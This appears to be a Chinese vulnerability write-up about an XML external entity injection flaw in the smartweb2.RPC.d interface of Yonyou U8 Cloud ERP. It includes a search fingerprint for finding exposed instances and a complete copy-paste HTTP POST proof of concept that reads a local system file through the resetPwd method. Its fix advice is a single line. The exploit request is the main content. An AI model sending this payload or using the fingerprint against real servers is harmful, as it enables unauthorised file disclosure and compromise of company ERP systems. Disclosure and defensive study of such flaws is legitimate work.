用友U8 Cloud smartweb2.RPC.d XML外部实体注入漏洞

产品介绍

用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。它包含ERP的各项应用,包括iUAP、财务会计、iUFO cloud、供应链与质量管理、人力资源、生产制造、管理会计、资产管理,以及电商通、U会员、U订货、友云采、友报账、友空间、友人才等用友云服务。

漏洞描述

用友U8 Cloud smartweb2.RPC.d接口存在XML外部实体注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,攻击者可通过xml实体注入漏洞获取敏感信息,进一步利用可造成主机失陷。

资产测绘

app="用友-U8-Cloud"

漏洞复现

POC如下:

c 复制代码
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 258
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

修复建议

联系厂商升级至最新安全版本。

相关推荐
hqxstudying2 小时前
Java异常处理
java·开发语言·安全·异常
林深的林3 小时前
Http证书体系及证书加密流程(通信流程)
网络协议·http·https
武子康7 小时前
Java-80 深入浅出 RPC Dubbo 动态服务降级:从雪崩防护到配置中心秒级生效
java·分布式·后端·spring·微服务·rpc·dubbo
7ACE10 小时前
Wireshark TS | 发送数据超出接收窗口
网络协议·tcp/ip·wireshark
先知后行。10 小时前
网络协议HTTP、TCP(草稿)
网络·网络协议
终焉暴龙王11 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
自由鬼12 小时前
Apache HTTP Server 2.4.49 的目录遍历漏洞CVE-2021-41773
网络协议·http·apache
百川12 小时前
Apache文件解析漏洞
web安全·apache
极地星光13 小时前
TCP/IP 网络编程面试题及解答
网络·网络协议·tcp/ip
Lucky高15 小时前
HTTP和HTTPS复习
网络协议·http·https